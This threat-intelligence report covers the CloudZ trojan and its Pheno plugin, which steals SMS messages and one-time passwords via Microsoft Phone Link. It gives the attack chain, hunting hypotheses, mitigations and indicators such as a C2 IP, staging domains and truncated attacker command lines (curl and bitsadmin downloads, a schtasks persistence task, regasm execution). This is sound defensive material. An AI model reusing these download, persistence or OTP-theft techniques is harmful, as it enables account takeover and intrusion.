Intelligence Center

What Happened

Security researchers have discovered a new cyberattack campaign that uses a malicious program called CloudZ. This program installs a special tool named Pheno to spy on the Microsoft Phone Link app, which connects a user's Windows computer to their smartphone. By monitoring this connection, the attackers can secretly read text messages and one-time passwords (OTPs) sent to the phone. This allows the attackers to bypass security measures like two-factor authentication on other accounts. Users should be cautious of fake software updates and organizations should monitor their systems for the specific warning signs associated with this malware.

Key Takeaways

• CloudZ RAT utilizes a novel plugin named Pheno to intercept SMS and OTP messages by abusing the Microsoft Phone Link application.
• The attack chain begins with a fake ScreenConnect update that drops a Rust-compiled loader.
• Persistence is established via a scheduled task that executes a .NET loader using the LOLBin regasm.exe.
• CloudZ operates dynamically in memory and employs extensive evasion techniques against debuggers, sandboxes, and security tools.
• The malware uses a three-method fallback approach (curl, PowerShell, bitsadmin) to download secondary payloads and plugins.

Affected Systems

• Windows 10
• Windows 11
• Microsoft Phone Link application

Attack Chain

The attack begins with a fake ScreenConnect update that executes a Rust-compiled dropper. This dropper places a .NET loader on the system and establishes persistence via a scheduled task that abuses regasm.exe. The loader decrypts and executes the CloudZ RAT in memory, which then connects to a C2 server and downloads the Pheno plugin. Pheno monitors the Microsoft Phone Link application to intercept SMS and OTPs from the local SQLite database.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: Yes
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No
• Platforms: Snort, ClamAV

The article provides Snort rule IDs and ClamAV signature names for detecting the CloudZ RAT and its network activity.

Detection Engineering Assessment

EDR Visibility: High — EDR solutions can detect the creation of suspicious scheduled tasks, the use of LOLBins like regasm.exe to load text files, and unusual process access to the Phone Link SQLite databases. Network Visibility: Medium — While C2 traffic is encrypted, the use of specific Pastebin URLs, Cloudflare Workers domains, and hardcoded User-Agent strings can be monitored. Detection Difficulty: Moderate — The malware uses in-memory execution and LOLBins to evade basic detection, but its reliance on scheduled tasks and specific file paths for staging provides reliable detection opportunities.

Required Log Sources

• Process Creation (Event ID 4688 / Sysmon Event ID 1)
• File Creation (Event ID 11)
• Scheduled Task Activity (Event ID 4698)

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for regasm.exe executing with command line arguments pointing to non-standard extensions like .txt, especially in C:\ProgramData.	Process Creation	Execution	Low
Monitor for unexpected processes accessing or copying the PhoneExperiences-*.db SQLite database associated with the Phone Link application.	File Access	Collection	Medium
Search for scheduled task creation events where the task name is SystemWindowsApis and the action involves PowerShell or regasm.exe.	Scheduled Task Creation	Persistence	Low
Identify curl.exe or bitsadmin.exe downloading executable files into C:\Windows\TEMP\ or C:\ProgramData.	Process Creation	Command and Control	Medium

Control Gaps

• Lack of MFA on initial access vectors
• Insufficient monitoring of LOLBin execution (regasm.exe)

Key Behavioral Indicators

• regasm.exe loading .txt files
• Creation of phonelink-<COMPUTERNAME>.txt in %TEMP% or C:\ProgramData
• Scheduled task named SystemWindowsApis

False Positive Assessment

• Low

Recommendations

Immediate Mitigation

• Block the identified C2 IP (185.196.10.136) and associated Cloudflare Worker domains.
• Search endpoints for the presence of 'update.txt' or 'pheno.exe' in the specified staging directories.

Infrastructure Hardening

• Restrict the execution of LOLBins like regasm.exe and bitsadmin.exe where not required for business operations.
• Implement network filtering to block access to unapproved file-sharing sites like Pastebin.

User Protection

• Educate users on the risks of fake software updates, particularly for remote access tools like ScreenConnect.
• Monitor or restrict the use of the Microsoft Phone Link application on corporate devices if not required.

Security Awareness

• Train employees to recognize social engineering tactics used to deliver fake software updates.
• Highlight the risk of SMS-based OTP interception and encourage the use of hardware security keys or app-based authenticators where possible.

MITRE ATT&CK Mapping

• T1059.001 - Command and Scripting Interpreter: PowerShell
• T1053.005 - Scheduled Task/Job: Scheduled Task
• T1218.009 - System Binary Proxy Execution: Regsvcs/Regasm
• T1140 - Deobfuscate/Decode Files or Information
• T1562.001 - Impair Defenses: Disable or Modify Tools
• T1005 - Data from Local System
• T1552.001 - Credentials In Files
• T1105 - Ingress Tool Transfer
• T1057 - Process Discovery

Additional IOCs

• Ips:
  • 185[.]196[.]10[.]136 - CloudZ C2 server IP address
• Domains:
  • calm-wildflower-1349[.]hellohiall[.]workers[.]dev - Staging server domain for downloading the .NET loader
  • round-cherry-4418[.]hellohiall[.]workers[.]dev - Staging server domain for secondary configuration
  • orange-cell-1353[.]hellohiall[.]workers[.]dev - Staging server domain for the Pheno plugin
  • calm-mountain-8d18[.]hellohiall[.]workers[.]dev - Staging server domain identified in malware configuration extraction
  • pastebin[.]com - Legitimate service abused to host secondary configuration data
• Urls:
  • hxxps://calm-wildflower-1349[.]hellohiall[.]workers[.]dev - URL used to download the .NET loader
  • hxxps://round-cherry-4418[.]hellohiall[.]workers[.]dev/?t=1773406370 - URL hosting secondary configuration data
  • hxxps://pastebin[.]com/raw/8pYAgF0Z?t=1771833517 - Pastebin URL hosting secondary configuration data
  • hxxps://orange-cell-1353[.]hellohiall[.]workers[.]dev/pheno.exe - Download URL for the Pheno plugin
  • hxxps://calm-mountain-8d18[.]hellohiall[.]workers[.]dev/?t=1771832539 - Secondary configuration URL identified in memory extraction
• File Paths:
  • C:\ProgramData\Microsoft\windosDoc\msupdate.txt - Alternative filename for the dropped .NET loader
  • C:\programdata\Microsoft\feedback\cm\phonelink-<COMPUTERNAME>.txt - Staging file used by Pheno plugin to log Phone Link reconnaissance data
  • %TEMP%\Microsoft\feedback\cm\phonelink-<COMPUTERNAME>.txt - Alternative staging file used by Pheno plugin to log Phone Link reconnaissance data
  • C:\ProgramData\Microsoft\whealth\ - Staging directory used by CloudZ to save plugins to disk
  • C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\regasm.exe - LOLBin used to execute the .NET loader
• Command Lines:
  • Purpose: Downloads the .NET loader from a staging server | Tools: curl.exe | Stage: Execution/Payload Delivery | curl -L -o C:\ProgramData\Microsoft\WindowsDoc\update.txt
  • Purpose: Creates a scheduled task for persistence | Tools: schtasks.exe | Stage: Persistence | schtasks /create /tn \Microsoft\Windows\SystemWindowsApis /tr
  • Purpose: Executes the .NET loader via LOLBin | Tools: powershell.exe, regasm.exe | Stage: Execution
  • Purpose: Checks for running instances of the loader | Tools: powershell.exe | Stage: Discovery/Execution | Get-CimInstance Win32_Process | Where-Object
  • Purpose: Fallback method to download payloads | Tools: bitsadmin.exe | Stage: Execution/Payload Delivery
• Other:
  • rustextractor.pdb - PDB string found in the Rust-compiled loader
  • SystemWindowsApis - Name of the scheduled task created for persistence
  • HELLOHIALL - Pastebin handler name used by the attacker
  • PhoneExperiences-*.db - SQLite database file targeted for SMS and OTP theft